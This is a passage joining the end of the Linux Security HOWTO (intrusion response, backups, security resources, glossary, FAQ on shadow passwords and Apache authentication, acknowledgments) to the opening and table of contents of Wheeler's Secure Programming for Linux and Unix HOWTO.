If you are unable to disconnect the network (if you have a busy site, or you
do not have physical control of your machines), the next best step is to use
something like tcp_wrappers or ipfwadm to deny access from the intruder's
site.
If you can't deny all people from the same site as the intruder, locking the
user's account will have to do. Note that locking an account is not an easy
thing. You have to keep in mind .rhosts files, FTP access, and a host of
possible backdoors.
After you have done one of the above (disconnected the network, denied
access from their site, and/or disabled their account), you need to kill all
their user processes and log them off.
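A minimal sketch of that step ("baduser" is a placeholder; run as root, and
remember this does not close .rhosts, FTP, or other backdoors):

```shell
# Lock the account's password, then signal every process the user owns,
# which also ends their login sessions. pkill is from the procps suite.
lock_and_boot() {
    passwd -l "$1"
    pkill -KILL -u "$1"
}
# Example: lock_and_boot baduser
```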
You should monitor your site well for the next few minutes, as the attacker
may try to get back in, perhaps using a different account and/or from a
different network address.
-----------------------------------------------------------------------------
10.2. Security Compromise has already happened
So you have either detected a compromise that has already happened or you
have detected it and locked (hopefully) the offending attacker out of your
system. Now what?
-----------------------------------------------------------------------------
10.2.1. Closing the Hole
If you are able to determine what means the attacker used to get into your
system, you should try to close that hole. For instance, perhaps you see
several FTP entries just before the user logged in. Disable the FTP service
and check and see if there is an updated version, or if any of the lists know
of a fix.
Check all your log files, and make a visit to your security lists and pages
and see if there are any new common exploits you can fix. You can find
Caldera security fixes at [http://www.caldera.com/tech-ref/security/] http://
www.caldera.com/tech-ref/security/. Red Hat has not yet separated their
security fixes from bug fixes, but their distribution errata is available at
[http://www.redhat.com/errata] http://www.redhat.com/errata
Debian now has a security mailing list and web page. See: [http://
www.debian.org/security/] http://www.debian.org/security/ for more
information.
It is very likely that if one vendor has released a security update, that
most other Linux vendors will as well.
There is now a Linux security auditing project. They are methodically going
through all the user-space utilities and looking for possible security
exploits and overflows. From their announcement:
""We are attempting a systematic audit of Linux sources with a view to being
as secure as OpenBSD. We have already uncovered (and fixed) some problems,
but more help is welcome. The list is unmoderated and also a useful resource
for general security discussions. The list address is:
security-audit@ferret.lmh.ox.ac.uk To subscribe, send a mail to:
security-audit-subscribe@ferret.lmh.ox.ac.uk""
If you don't lock the attacker out, they will likely be back. Not just back
on your machine, but back somewhere on your network. If they were running a
packet sniffer, odds are good they have access to other local machines.
-----------------------------------------------------------------------------
10.2.2. Assessing the Damage
The first thing is to assess the damage. What has been compromised? If you
are running an integrity checker like Tripwire, you can use it to perform an
integrity check; it should help to tell you what has been compromised. If
not, you will have to look around at all your important data.
Since Linux systems are getting easier and easier to install, you might
consider saving your config files, wiping your disk(s), reinstalling, then
restoring your user files and your config files from backups. This will
ensure that you have a new, clean system. If you have to restore files from
the compromised system, be especially cautious of any binaries that you
restore, as they may be Trojan horses placed there by the intruder.
Re-installation should be considered mandatory upon an intruder obtaining
root access. Additionally, you'd like to keep any evidence there is, so
having a spare disk in the safe may make sense.
Then you have to worry about how long ago the compromise happened, and
whether the backups hold any damaged work. More on backups later.
-----------------------------------------------------------------------------
10.2.3. Backups, Backups, Backups!
Having regular backups is a godsend for security matters. If your system is
compromised, you can restore the data you need from backups. Of course, some
data is valuable to the attacker too, and they will not only destroy it, they
will steal it and have their own copies; but at least you will still have the
data.
You should check several backups back into the past before restoring a file
that has been tampered with. The intruder could have compromised your files
long ago, and you could have made many successful backups of the compromised
file!
Of course, there are also a raft of security concerns with backups. Make
sure you are storing them in a secure place. Know who has access to them. (If
an attacker can get your backups, they can have access to all your data
without you ever knowing it.)
-----------------------------------------------------------------------------
10.2.4. Tracking Down the Intruder.
Ok, you have locked the intruder out, and recovered your system, but you're
not quite done yet. While it is unlikely that most intruders will ever be
caught, you should report the attack.
You should report the attack to the admin contact at the site from which the
attacker attacked your system. You can look up this contact with whois or the
Internic database. You might send them an email with all applicable log
entries and dates and times. If you spotted anything else distinctive about
your intruder, you might mention that too. After sending the email, you
should (if you are so inclined) follow up with a phone call. If that admin in
turn spots your attacker, they might be able to talk to the admin of the site
where they are coming from and so on.
Good crackers often use many intermediate systems, some (or many) of which
may not even know they have been compromised. Trying to track a cracker back
to their home system can be difficult. Being polite to the admins you talk to
can go a long way to getting help from them.
You should also notify any security organizations you are a part of ([http:/
/www.cert.org/] CERT or similar), as well as your Linux system vendor.
-----------------------------------------------------------------------------
11. Security Sources
There are a LOT of good sites out there for Unix security in general and
Linux security specifically. It's very important to subscribe to one (or
more) of the security mailing lists and keep current on security fixes. Most
of these lists are very low volume, and very informative.
-----------------------------------------------------------------------------
11.1. LinuxSecurity.com References
The LinuxSecurity.com web site has numerous Linux and open source security
references written by the LinuxSecurity staff and by contributors from around
the world.
  * [http://www.linuxsecurity.com/vuln-newsletter.html] Linux Advisory Watch
    -- A comprehensive newsletter that outlines the security vulnerabilities
    that have been announced throughout the week. It includes pointers to
    updated packages and descriptions of each vulnerability.
  * [http://www.linuxsecurity.com/newsletter.html] Linux Security Week --
    The purpose of this document is to provide our readers with a quick
    summary of each week's most relevant Linux security headlines.
  * [http://www.linuxsecurity.com/general/mailinglists.html] Linux Security
    Discussion List -- This mailing list is for general security-related
    questions and comments.
  * [http://www.linuxsecurity.com/general/mailinglists.html] Linux Security
    Newsletters -- Subscription information for all newsletters.
  * [http://www.linuxsecurity.com/docs/colsfaq.html] comp.os.linux.security
    FAQ -- Frequently Asked Questions with answers for the
    comp.os.linux.security newsgroup.
  * [http://www.linuxsecurity.com/docs/] Linux Security Documentation -- A
    great starting point for information pertaining to Linux and Open Source
    security.
-----------------------------------------------------------------------------
11.2. FTP Sites
CERT is the Computer Emergency Response Team. They often send out alerts of
current attacks and fixes. See [ftp://ftp.cert.org] ftp://ftp.cert.org for
more information.
ZEDZ (formerly Replay) ([http://www.zedz.net] http://www.zedz.net) has
archives of many security programs. Since they are outside the US, they don't
need to obey US crypto restrictions.
Matt Blaze is the author of CFS and a great security advocate. Matt's
archive is available at [ftp://ftp.research.att.com/pub/mab] ftp://
ftp.research.att.com/pub/mab
tue.nl is a great security FTP site in the Netherlands. [ftp://
ftp.win.tue.nl/pub/security/] ftp.win.tue.nl
-----------------------------------------------------------------------------
11.3. Web Sites
  * The Hacker FAQ is a FAQ about hackers: [http://www.solon.com/~seebs/faqs
    /hacker.html] The Hacker FAQ
  * The COAST archive has a large number of Unix security programs and
    information: [http://www.cs.purdue.edu/coast/] COAST
  * SuSE Security Page: [http://www.suse.de/security/] http://www.suse.de/
    security/
  * Rootshell.com is a great site for seeing what exploits are currently
    being used by crackers: [http://www.rootshell.com/] http://
    www.rootshell.com/
  * BUGTRAQ puts out advisories on security issues: [http://www.netspace.org
    /lsv-archive/bugtraq.html] BUGTRAQ archives
  * CERT, the Computer Emergency Response Team, puts out advisories on
    common attacks on Unix platforms: [http://www.cert.org/] CERT home
  * Dan Farmer is the author of SATAN and many other security tools. His
    home site has some interesting security survey information, as well as
    security tools: [http://www.trouble.org] http://www.trouble.org
  * The Linux security WWW is a good site for Linux security information:
    [http://www.aoy.com/Linux/Security/] Linux Security WWW
  * Infilsec has a vulnerability engine that can tell you what
    vulnerabilities affect a specific platform: [http://www.infilsec.com/
    vulnerabilities/] http://www.infilsec.com/vulnerabilities/
  * CIAC sends out periodic security bulletins on common exploits: [http://
    ciac.llnl.gov/cgi-bin/index/bulletins] http://ciac.llnl.gov/cgi-bin/index
    /bulletins
  * A good starting point for Linux Pluggable Authentication Modules can be
    found at [http://www.kernel.org/pub/linux/libs/pam/] http://
    www.kernel.org/pub/linux/libs/pam/.
  * The Debian project has a web page for their security fixes and
    information. It is at [http://www.debian.org/security/] http://
    www.debian.org/security/.
  * The WWW Security FAQ, written by Lincoln Stein, is a great web security
    reference. Find it at [http://www.w3.org/Security/Faq/
    www-security-faq.html] http://www.w3.org/Security/Faq/
    www-security-faq.html
-----------------------------------------------------------------------------
11.4. Mailing Lists
Bugtraq: To subscribe to bugtraq, send mail to listserv@netspace.org
containing the message body "subscribe bugtraq" (see the links above for
archives).
CIAC: Send e-mail to majordomo@tholia.llnl.gov. In the BODY (not subject) of
the message put: subscribe ciac-bulletin
Red Hat has a number of mailing lists, the most important of which is the
redhat-announce list. You can read about security (and other) fixes as soon
as they come out. Send email to redhat-announce-list-request@redhat.com with
the subject "Subscribe". See [https://listman.redhat.com/mailman/listinfo/]
https://listman.redhat.com/mailman/listinfo/ for more info and archives.
The Debian project has a security mailing list that covers their security
fixes. See [http://www.debian.org/security/] http://www.debian.org/security/
for more information.
-----------------------------------------------------------------------------
11.5. Books - Printed Reading Material
There are a number of good security books out there. This section lists a
few of them. In addition to the security specific books, security is covered
in a number of other books on system administration.
  * Building Internet Firewalls By D. Brent Chapman & Elizabeth D. Zwicky,
    1st Edition September 1995, ISBN: 1-56592-124-0
  * Practical UNIX & Internet Security, 2nd Edition By Simson Garfinkel &
    Gene Spafford, 2nd Edition April 1996, ISBN: 1-56592-148-8
  * Computer Security Basics By Deborah Russell & G.T. Gangemi, Sr., 1st
    Edition July 1991, ISBN: 0-937175-71-4
  * Linux Network Administrator's Guide By Olaf Kirch, 1st Edition January
    1995, ISBN: 1-56592-087-2
  * PGP: Pretty Good Privacy By Simson Garfinkel, 1st Edition December 1994,
    ISBN: 1-56592-098-8
  * Computer Crime: A Crimefighter's Handbook By David Icove, Karl Seger &
    William VonStorch (Consulting Editor Eugene H. Spafford), 1st Edition
    August 1995, ISBN: 1-56592-086-4
  * Linux Security By John S. Flowers, New Riders; ISBN: 0735700354, March
    1999
  * Maximum Linux Security: A Hacker's Guide to Protecting Your Linux
    Server and Network, Anonymous, Paperback - 829 pages, Sams; ISBN:
    0672313413, July 1999
  * Intrusion Detection By Terry Escamilla, Paperback - 416 pages (September
    1998), John Wiley and Sons; ISBN: 0471290009
  * Fighting Computer Crime, Donn Parker, Paperback - 526 pages (September
    1998), John Wiley and Sons; ISBN: 0471163783
-----------------------------------------------------------------------------
12. Glossary
Included below are several of the most frequently used terms in computer
security. A comprehensive dictionary of computer security terms is available
in the [http://www.linuxsecurity.com/dictionary/] LinuxSecurity.com
Dictionary.
  * authentication: The process of knowing that the data received is the
    same as the data that was sent, and that the claimed sender is in fact
    the actual sender.
  * bastion host: A computer system that must be highly secured because it
    is vulnerable to attack, usually because it is exposed to the Internet
    and is a main point of contact for users of internal networks. It gets
    its name from the highly fortified projections on the outer walls of
    medieval castles. Bastions overlook critical areas of defense, usually
    having strong walls, room for extra troops, and the occasional useful tub
    of boiling hot oil for discouraging attackers.
  * buffer overflow: A common coding error is to allocate buffers that are
    too small and to fail to check for overflows. When such a buffer
    overflows, the executing program (daemon or set-uid program) can be
    tricked into doing something else. Generally this works by overwriting a
    function's return address on the stack to point to another location.
  * denial of service: An attack that consumes the resources on your
    computer for things it was not intended to be doing, thus preventing
    normal use of your network resources for legitimate purposes.
  * dual-homed host: A general-purpose computer system that has at least two
    network interfaces.
  * firewall: A component or set of components that restricts access between
    a protected network and the Internet, or between other sets of networks.
  * host: A computer system attached to a network.
  * IP spoofing: A complex technical attack that is made up of several
    components. It is a security exploit that works by tricking computers in
    a trust relationship into thinking that you are someone that you really
    aren't. There is an extensive paper written by daemon9, route, and
    infinity in Volume Seven, Issue Forty-Eight of Phrack Magazine.
  * non-repudiation: The property of a receiver being able to prove that the
    sender of some data did in fact send the data even though the sender
    might later deny ever having sent it.
  * packet: The fundamental unit of communication on the Internet.
  * packet filtering: The action a device takes to selectively control the
    flow of data to and from a network. Packet filters allow or block
    packets, usually while routing them from one network to another (most
    often from the Internet to an internal network, and vice versa). To
    accomplish packet filtering, you set up rules that specify what types of
    packets (those to or from a particular IP address or port) are to be
    allowed and what types are to be blocked.
  * perimeter network: A network added between a protected network and an
    external network, in order to provide an additional layer of security. A
    perimeter network is sometimes called a DMZ.
  * proxy server: A program that deals with external servers on behalf of
    internal clients. Proxy clients talk to proxy servers, which relay
    approved client requests to real servers, and relay answers back to
    clients.
  * superuser: An informal name for root.
-----------------------------------------------------------------------------
13. Frequently Asked Questions
1. Is it more secure to compile driver support directly into the kernel,
instead of making it a module?
Answer: Some people think it is better to disable the ability to load
device drivers using modules, because an intruder could load a Trojan
module or a module that could affect system security.
However, in order to load modules, you must be root. The module object
files are also only writable by root. This means the intruder would need
root access to insert a module. If the intruder gains root access, there
are more serious things to worry about than whether he will load a
module.
Modules are for dynamically loading support for a particular device that
may be infrequently used. On server machines, or firewalls for instance,
this is very unlikely to happen. For this reason, it would make more
sense to compile support directly into the kernel for machines acting as
a server. Modules are also slower than support compiled directly in the
kernel.
2. Why does logging in as root from a remote machine always fail?
Answer: See Section 4.2. This is done intentionally to prevent remote
users from attempting to connect via telnet to your machine as root,
which is a serious security vulnerability, because then the root password
would be transmitted, in clear text, across the network. Don't forget:
potential intruders have time on their side, and can run automated
programs to find your password. Additionally, this is done to keep a
clear record of who logged in, not just root.
3. How do I enable shadow passwords on my Linux box?
Answer:
To enable shadow passwords, run pwconv as root, and /etc/shadow should
now exist, and be used by applications. If you are using RH 4.2 or above,
the PAM modules will automatically adapt to the change from using normal
/etc/passwd to shadow passwords without any other change.
Some background: shadow passwords are a mechanism for storing your
password in a file other than the normal /etc/passwd file. This has
several advantages. The first one is that the shadow file, /etc/shadow,
is only readable by root, unlike /etc/passwd, which must remain readable
by everyone. The other advantage is that as the administrator, you can
enable or disable accounts without everyone knowing the status of other
users' accounts.
The /etc/passwd file is then used to store user and group names, used by
programs like /bin/ls to map the user ID to the proper user name in a
directory listing.
The /etc/shadow file then only contains the user name and his/her
password, and perhaps accounting information, like when the account
expires, etc.
Since you're interested in securing your passwords, perhaps you would
also be interested in generating good passwords to begin with. For this
you can use the pam_cracklib module, which is part of PAM. It runs your
password against the Crack libraries to help you decide if it is
too-easily guessable by password-cracking programs.
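   As a sketch of what the conversion changes, the fragment below mimics the
   before/after file formats on invented sample data (the user, the hash, and
   the day count 12422 are placeholders). On a real system you would simply
   run pwconv as root rather than editing anything by hand.

```shell
# Illustration of what pwconv does, run on sample data rather than the
# real files. A pre-shadow passwd entry keeps the hash in field 2:
cat > passwd.sample <<'EOF'
alice:Ep6mckrOLChF.:1000:1000:Alice:/home/alice:/bin/bash
EOF
# After conversion, /etc/passwd holds only an "x" placeholder...
awk -F: 'BEGIN{OFS=":"} {$2="x"; print}' passwd.sample > passwd.converted
cat passwd.converted
# ...and the hash moves to the root-readable /etc/shadow, followed by
# password-aging fields (last-change day, min/max age, warning, etc.):
awk -F: '{print $1 ":" $2 ":12422:0:99999:7:::"}' passwd.sample > shadow.converted
cat shadow.converted
```

   The important property is visible in the result: the world-readable file no
   longer contains anything an attacker could feed to a password cracker.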
4. How can I enable the Apache SSL extensions?
Answer:
   a. Get SSLeay 0.8.0 or later from [ftp://ftp.psy.uq.oz.au/pub/Crypto/
      SSL] ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL
   b. Build, test, and install it.
   c. Get the Apache source.
   d. Get the Apache SSLeay extensions from [ftp://ftp.ox.ac.uk/pub/crypto/SSL
      /] ftp://ftp.ox.ac.uk/pub/crypto/SSL/
   e. Unpack them in the Apache source directory and patch Apache as per the
      README.
   f. Configure and build it.
   You might also try [http://www.zedz.net] ZEDZ net, which has many
   pre-built packages, and is located outside of the United States.
5. How can I manipulate user accounts, and still retain security?
   Answer: Most distributions contain a great number of tools to change the
   properties of user accounts.
    + The pwconv and pwunconv programs can be used to convert between
      shadow and non-shadowed passwords.
    + The pwck and grpck programs can be used to verify proper
      organization of the passwd and group files.
    + The useradd, usermod, and userdel programs can be used to add,
      delete and modify user accounts. The groupadd, groupmod, and groupdel
      programs will do the same for groups.
    + Group passwords can be created using gpasswd.
   All these programs are "shadow-aware" -- that is, if you enable shadow
   they will use /etc/shadow for password information, otherwise they won't.
   See the respective man pages for further information.
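   One of the checks pwck performs can be sketched in plain shell on an
   invented sample file: a well-formed passwd entry has exactly seven
   colon-separated fields. The entries below, including the deliberately
   "broken" one, are made up for illustration.

```shell
# A pwck-style sanity check in plain shell: flag passwd entries that do
# not have exactly seven colon-separated fields.
cat > passwd.sample <<'EOF'
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
broken:x:1001:1001:Missing shell field:/home/broken
EOF
awk -F: 'NF != 7 {print "malformed entry: " $1}' passwd.sample
# The real tools check much more (duplicate UIDs, valid home directories,
# shadow consistency); run "pwck -r" as root for a read-only report.
```

   Only the third line is flagged, since it lacks the final shell field.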
6. How can I password-protect specific HTML documents using Apache?
   I bet you didn't know about [http://www.apacheweek.com] http://
   www.apacheweek.com, did you?
You can find information on user authentication at [http://
www.apacheweek.com/features/userauth] http://www.apacheweek.com/features/
userauth as well as other web server security tips from [http://
www.apache.org/docs/misc/security_tips.html] http://www.apache.org/docs/
misc/security_tips.html
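   As an illustration of the technique those pages describe, the sketch below
   drops a Basic-authentication .htaccess file into a directory. The directory
   name, password-file path, and realm name are all assumptions, and the
   server must permit overrides for that directory (AllowOverride AuthConfig)
   for the file to take effect.

```shell
# Sketch: protect a directory of HTML documents with HTTP Basic auth.
# All paths here are hypothetical examples.
mkdir -p protected-docs
cat > protected-docs/.htaccess <<'EOF'
AuthType Basic
AuthName "Restricted Documents"
AuthUserFile /etc/httpd/conf/htpasswd
require valid-user
EOF
cat protected-docs/.htaccess
# Create the password file (kept outside the document tree) with the
# htpasswd utility shipped with Apache:
#   htpasswd -c /etc/httpd/conf/htpasswd alice
```

   Note that Basic authentication sends credentials essentially in the clear
   on every request, so for anything sensitive it should be combined with SSL.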
-----------------------------------------------------------------------------
14. Conclusion
By subscribing to the security alert mailing lists, and keeping current, you
can do a lot towards securing your machine. If you pay attention to your log
files and run something like tripwire regularly, you can do even more.
A reasonable level of computer security is not difficult to maintain on a
home machine. More effort is required on business machines, but Linux can
indeed be a secure platform. Due to the nature of Linux development, security
fixes often come out much faster than they do on commercial operating
systems, making Linux an ideal platform when security is a requirement.
-----------------------------------------------------------------------------
15. Acknowledgments
Information here is collected from many sources. Thanks to the following who
either indirectly or directly have contributed:
Rob Riggs
[mailto:rob@DevilsThumb.com] rob@DevilsThumb.com
S. Coffin [mailto:scoffin@netcom.com] scoffin@netcom.com
Viktor Przebinda [mailto:viktor@CRYSTAL.MATH.ou.edu]
viktor@CRYSTAL.MATH.ou.edu
Roelof Osinga [mailto:roelof@eboa.com] roelof@eboa.com
Kyle Hasselbacher [mailto:kyle@carefree.quux.soltec.net]
kyle@carefree.quux.soltec.net
David S. Jackson [mailto:dsj@dsj.net] dsj@dsj.net
Todd G. Ruskell [mailto:ruskell@boulder.nist.gov] ruskell@boulder.nist.gov
Rogier Wolff [mailto:R.E.Wolff@BitWizard.nl] R.E.Wolff@BitWizard.nl
Antonomasia [mailto:ant@notatla.demon.co.uk] ant@notatla.demon.co.uk
Nic Bellamy [mailto:sky@wibble.net] sky@wibble.net
Eric Hanchrow [mailto:offby1@blarg.net] offby1@blarg.net
Robert J. Berger [mailto:rberger@ibd.com] rberger@ibd.com
Ulrich Alpers [mailto:lurchi@cdrom.uni-stuttgart.de]
lurchi@cdrom.uni-stuttgart.de
David Noha [mailto:dave@c-c-s.com] dave@c-c-s.com
Pavel Epifanov. [mailto:epv@ibm.net] epv@ibm.net
Joe Germuska. [mailto:joe@germuska.com] joe@germuska.com
Franklin S. Werren [mailto:fswerren@bagpipes.net] fswerren@bagpipes.net
Paul Rusty Russell [mailto:Paul.Russell@rustcorp.com.au] <
Paul.Russell@rustcorp.com.au>
Christine Gaunt [mailto:cgaunt@umich.edu] <cgaunt@umich.edu>
lin [mailto:bhewitt@refmntutl01.afsc.noaa.gov]
bhewitt@refmntutl01.afsc.noaa.gov
A. Steinmetz [mailto:astmail@yahoo.com] astmail@yahoo.com
Jun Morimoto [mailto:morimoto@xantia.citroen.org]
morimoto@xantia.citroen.org
Xiaotian Sun [mailto:sunx@newton.me.berkeley.edu]
sunx@newton.me.berkeley.edu
Eric Hanchrow [mailto:offby1@blarg.net] offby1@blarg.net
Camille Begnis [mailto:camille@mandrakesoft.com] camille@mandrakesoft.com
Neil D [mailto:neild@sympatico.ca] neild@sympatico.ca
Michael Tandy [mailto:Michael.Tandy@BTInternet.com]
Michael.Tandy@BTInternet.com
Tony Foiani [mailto:tkil@scrye.com] tkil@scrye.com
Matt Johnston [mailto:mattj@flashmail.com] mattj@flashmail.com
Geoff Billin [mailto:gbillin@turbonet.com] gbillin@turbonet.com
Hal Burgiss [mailto:hburgiss@bellsouth.net] hburgiss@bellsouth.net
Ian Macdonald [mailto:ian@linuxcare.com] ian@linuxcare.com
M.Kiesel [mailto:m.kiesel@iname.com] m.kiesel@iname.com
Mario Kratzer [mailto:kratzer@mathematik.uni-marburg.de]
kratzer@mathematik.uni-marburg.de
Othmar Pasteka [mailto:pasteka@kabsi.at] pasteka@kabsi.at
Robert M [mailto:rom@romab.com] rom@romab.com
Cinnamon Lowe [mailto:clowe@cinci.rr.com] clowe@cinci.rr.com
Rob McMeekin [mailto:blind_mordecai@yahoo.com] blind_mordecai@yahoo.com
Gunnar Ritter [mailto:g-r@bigfoot.de] g-r@bigfoot.de
Frank Lichtenheld [mailto:frank@lichtenheld.de] frank@lichtenheld.de
Björn Lotz [mailto:blotz@suse.de] blotz@suse.de
Othon Marcelo Nunes Batista [mailto:othonb@superig.com.br]
othonb@superig.com.br
The following have translated this HOWTO into various other languages!
A special thank you to all of them for helping spread the Linux word...
Polish: Ziemek Borowski [mailto:ziembor@FAQ-bot.ZiemBor.Waw.PL]
ziembor@FAQ-bot.ZiemBor.Waw.PL
Japanese: FUJIWARA Teruyoshi [mailto:fjwr@mtj.biglobe.ne.jp]
fjwr@mtj.biglobe.ne.jp
Indonesian: Tedi Heriyanto [mailto:22941219@students.ukdw.ac.id]
22941219@students.ukdw.ac.id
Korean: Bume Chang [mailto:Boxcar0001@aol.com] Boxcar0001@aol.com
Spanish: Juan Carlos Fernandez [mailto:piwiman@visionnetware.com]
piwiman@visionnetware.com
Dutch: "Nine Matthijssen" [mailto:nine@matthijssen.nl] nine@matthijssen.nl
Norwegian: ketil@vestby.com [mailto:ketil@vestby.com] ketil@vestby.com
Turkish: tufan karadere [mailto:tufank@metu.edu.tr] tufank@metu.edu.tr
Secure Programming for Linux and Unix HOWTO
David A. Wheeler
v3.010 Edition
Copyright © 1999, 2000, 2001, 2002, 2003 David A. Wheeler
v3.010, 3 March 2003
This book provides a set of design and implementation guidelines for writing
secure programs for Linux and Unix systems. Such programs include application
programs used as viewers of remote data, web applications (including CGI
scripts), network servers, and setuid/setgid programs. Specific guidelines
for C, C++, Java, Perl, PHP, Python, Tcl, and Ada95 are included. For a
current version of the book, see [http://www.dwheeler.com/secure-programs]
http://www.dwheeler.com/secure-programs
This book is Copyright (C) 1999-2003 David A. Wheeler. Permission is granted
to copy, distribute and/or modify this book under the terms of the GNU Free
Documentation License (GFDL), Version 1.1 or any later version published by
the Free Software Foundation; with the invariant sections being ``About the
Author'', with no Front-Cover Texts, and no Back-Cover texts. A copy of the
license is included in the section entitled "GNU Free Documentation License".
This book is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
A PARTICULAR PURPOSE.
-----------------------------------------------------------------------------
Table of Contents
1. Introduction
2. Background
2.1. History of Unix, Linux, and Open Source / Free Software
2.2. Security Principles
2.3. Why do Programmers Write Insecure Code?
2.4. Is Open Source Good for Security?
2.5. Types of Secure Programs
2.6. Paranoia is a Virtue
2.7. Why Did I Write This Document?
2.8. Sources of Design and Implementation Guidelines
2.9. Other Sources of Security Information
2.10. Document Conventions
3. Summary of Linux and Unix Security Features
3.1. Processes
3.2. Files
3.3. System V IPC
3.4. Sockets and Network Connections
3.5. Signals
3.6. Quotas and Limits
3.7. Dynamically Linked Libraries
3.8. Audit
3.9. PAM
3.10. Specialized Security Extensions for Unix-like Systems
4. Security Requirements
4.1. Common Criteria Introduction
4.2. Security Environment and Objectives
4.3. Security Functionality Requirements
4.4. Security Assurance Measure Requirements
5. Validate All Input
5.1. Command line
5.2. Environment Variables
5.3. File Descriptors
5.4. File Names
5.5. File Contents
5.6. Web-Based Application Inputs (Especially CGI Scripts)
5.7. Other Inputs
5.8. Human Language (Locale) Selection
5.9. Character Encoding
5.10. Prevent Cross-site Malicious Content on Input
5.11. Filter HTML/URIs That May Be Re-presented
5.12. Forbid HTTP GET To Perform Non-Queries
5.13. Counter SPAM
5.14. Limit Valid Input Time and Load Level
6. Avoid Buffer Overflow
6.1. Dangers in C/C++
6.2. Library Solutions in C/C++
6.3. Compilation Solutions in C/C++
6.4. Other Languages
7. Structure Program Internals and Approach
7.1. Follow Good Software Engineering Principles for Secure Programs
7.2. Secure the Interface
7.3. Separate Data and Control
7.4. Minimize Privileges
7.5. Minimize the Functionality of a Component
7.6. Avoid Creating Setuid/Setgid Scripts
7.7. Configure Safely and Use Safe Defaults
7.8. Load Initialization Values Safely
7.9. Fail Safe
7.10. Avoid Race Conditions
7.11. Trust Only Trustworthy Channels
7.12. Set up a Trusted Path
7.13. Use Internal Consistency-Checking Code
7.14. Self-limit Resources
7.15. Prevent Cross-Site (XSS) Malicious Content
7.16. Foil Semantic Attacks
7.17. Be Careful with Data Types
8. Carefully Call Out to Other Resources
8.1. Call Only Safe Library Routines
8.2. Limit Call-outs to Valid Values
8.3. Handle Metacharacters
8.4. Call Only Interfaces Intended for Programmers
8.5. Check All System Call Returns
8.6. Avoid Using vfork(2)
8.7. Counter Web Bugs When Retrieving Embedded Content
8.8. Hide Sensitive Information
9. Send Information Back Judiciously
9.1. Minimize Feedback
9.2. Don't Include Comments
9.3. Handle Full/Unresponsive Output
9.4. Control Data Formatting (Format Strings/Formatation)
9.5. Control Character Encoding in Output
9.6. Prevent Include/Configuration File Access
10. Language-Specific Issues
10.1. C/C++
10.2. Perl
10.3. Python
10.4. Shell Scripting Languages (sh and csh Derivatives)
10.5. Ada
10.6. Java
10.7. Tcl
10.8. PHP
11. Special Topics
11.1. Passwords
11.2. Authenticating on the Web
11.3. Random Numbers
11.4. Specially Protect Secrets (Passwords and Keys) in User Memory
11.5. Cryptographic Algorithms and Protocols
11.6. Using PAM
11.7. Tools
11.8. Windows CE
11.9. Write Audit Records
11.10. Physical Emissions
11.11. Miscellaneous
12. Conclusion
13. Bibliography
A. History
B. Acknowledgements
C. About the Documentation License
D. GNU Free Documentation License
E. Endorsements
F. About the Author
List of Tables
5-1. Legal UTF-8 Sequences
List of Figures
1-1. Abstract View of a Program
-----------------------------------------------------------------------------
Chapter 1. Introduction
   A wise man attacks the city of the
   mighty and pulls down the stronghold
   in which they trust.
   Proverbs 21:22 (NIV)
This book describes a set of guidelines for writing secure programs on Linux
and Unix systems. For purposes of this book, a ``secure program'' is a
program that sits on a security boundary, taking input from a source that
does not have the same access rights as the program. Such programs include
application programs used as viewers of remote data, web applications
(including CGI scripts), network servers, and setuid/setgid programs. This
book does not address modifying the operating system kernel itself, although
many of the principles discussed here do apply. These guidelines were
developed as a survey of ``lessons learned'' from various sources on how to
create such programs (along with additional observations by the author),
reorganized into a set of larger principles. This book includes specific
guidance for a number of languages, including C, C++, Java, Perl, PHP,
Python, Tcl, and Ada95.
You can find the master copy of this book at [http://www.dwheeler.com/
secure-programs] http://www.dwheeler.com/secure-programs. This book is also
part of the Linux Documentation Project (LDP) at [http://www.tldp.org]
http://www.tldp.org. It's also mirrored in several other places. Please note that
these mirrors, including the LDP copy and/or the copy in your distribution,
may be older than the master copy. I'd like to hear comments on this book,
but please do not send comments until you've checked to make sure that your
comment is valid for the latest version.
This book does not cover assurance measures, software engineering processes,
and quality assurance approaches, which are important but widely discussed
elsewhere. Such measures include testing, peer review, configuration
management, and formal methods. Documents specifically identifying sets of
development assurance measures for security issues include the Common
Criteria (CC, [CC 1999]) and the Systems Security Engineering Capability
Maturity Model [SSE-CMM 1999]. Inspections and other peer review techniques
are discussed in [Wheeler 1996]. This book does briefly discuss ideas from
the CC, but only as an organizational aid to discuss security requirements.
More general sets of software engineering processes are defined in documents
such as the Software Engineering Institute's Capability Maturity Model for
Software (SW-CMM) [Paulk 1993a, 1993b] and ISO 12207 [ISO 12207]. General
international standards for quality systems are defined in ISO 9000 and ISO
9001 [ISO 9000, 9001].
This book does not discuss how to configure a system (or network) to be
secure in a given environment. This is clearly necessary for secure use of a
given program, but a great many other documents discuss secure
configurations. An excellent general book on configuring Unix-like systems to
be secure is Garfinkel [1996]. Other books for securing Unix-like systems
include Anonymous [1998]. You can also find information on configuring
Unix-like systems at web sites such as [http://www.unixtools.com/
security.html] http://www.unixtools.com/security.html. Information on
configuring a Linux system to be secure is available in a wide variety of
documents including Fenzi [1999], Seifried [1999], Wreski [1998], Swan
[2001], and Anonymous [1999]. Geodsoft [2001] describes how to harden
OpenBSD, and many of its suggestions are useful for any Unix-like system.
Information on auditing existing Unix-like systems is discussed in Mookhey
[2002]. For Linux systems (and eventually other Unix-like systems), you may
want to examine the Bastille Hardening System, which attempts to ``harden''
or ``tighten'' the Linux operating system. You can learn more about Bastille
at [http://www.bastille-linux.org] http://www.bastille-linux.org; it is
available for free under the General Public License (GPL). Other hardening
systems include [http://www.grsecurity.net] grsecurity. For Windows 2000, you
might want to look at Cox [2000]. The U.S. National Security Agency (NSA)
maintains a set of security recommendation guides at [http://
nsa1.www.conxion.com] http://nsa1.www.conxion.com, including the ``60 Minute
Network Security Guide.'' If you're trying to establish a public key
infrastructure (PKI) using open source tools, you might want to look at the
[http://ospkibook.sourceforge.net] Open Source PKI Book. More about firewalls
and Internet security is found in [Cheswick 1994].
Configuring a computer is only part of Security Management, a larger area
that also covers how to deal with viruses, what kind of organizational
security policy is needed, business continuity plans, and so on. There are
international standards and guidance for security management. ISO 13335 is a
five-part technical report giving guidance on security management [ISO
13335]. ISO/IEC 17799:2000 defines a code of practice [ISO 17799]; its stated
purpose is to give high-level and general ``recommendations for information
